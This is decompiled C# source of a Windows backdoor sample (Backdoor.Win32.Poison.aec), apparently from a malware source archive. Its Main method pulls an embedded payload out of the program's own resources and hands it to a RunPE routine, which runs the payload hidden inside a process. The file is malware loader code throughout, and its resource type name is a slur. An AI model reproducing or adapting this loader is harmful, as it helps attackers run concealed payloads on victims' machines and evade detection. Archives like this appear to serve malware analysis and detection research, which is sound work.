MalwareSourceCode/MSIL/Backdoor/Win32/P/Backdoor.Win32.Poison.aec-2b0740b68917a42d6ada501b21334e0148d2019f46109d3bfe3a1b17ed23caa8/Module1.cs

// Decompiled with JetBrains decompiler
// Type: Cursor.Module1
// Assembly: Cursor, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: B3356960-2D13-4E8B-9A22-3EBE56F6B0CE
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Backdoor.Win32.Poison.aec-2b0740b68917a42d6ada501b21334e0148d2019f46109d3bfe3a1b17ed23caa8.exe

using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;

namespace Cursor
{
  [StandardModule]
  internal sealed class Module1
  {
    [DllImport("kernel32.dll", SetLastError = true)]
    private static extern IntPtr FindResource(IntPtr hModule, string lpName, string lpType);

    [DllImport("kernel32", EntryPoint = "GetModuleHandleA", CharSet = CharSet.Ansi, SetLastError = true)]
    private static extern IntPtr GetModuleHandle([MarshalAs(UnmanagedType.VBByRefStr)] ref string moduleName);

    [DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
    private static extern int SizeofResource(IntPtr hModule, IntPtr hResInfo);

    [DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
    private static extern IntPtr LoadResource(IntPtr hModule, IntPtr hResInfo);

    [STAThread]
    public static void Main()
    {
      string moduleName = Process.GetCurrentProcess().MainModule.ModuleName;
      IntPtr moduleHandle = Module1.GetModuleHandle(ref moduleName);
      IntPtr resource = Module1.FindResource(moduleHandle, "69", "GAY");
      IntPtr source = Module1.LoadResource(moduleHandle, resource);
      int length = Module1.SizeofResource(moduleHandle, resource);
      byte[] numArray = new byte[checked (length - 1 + 1)];
      Marshal.Copy(source, numArray, 0, length);
      x86.RunPE(numArray, Process.GetCurrentProcess().MainModule.FileName);
    }
  }
}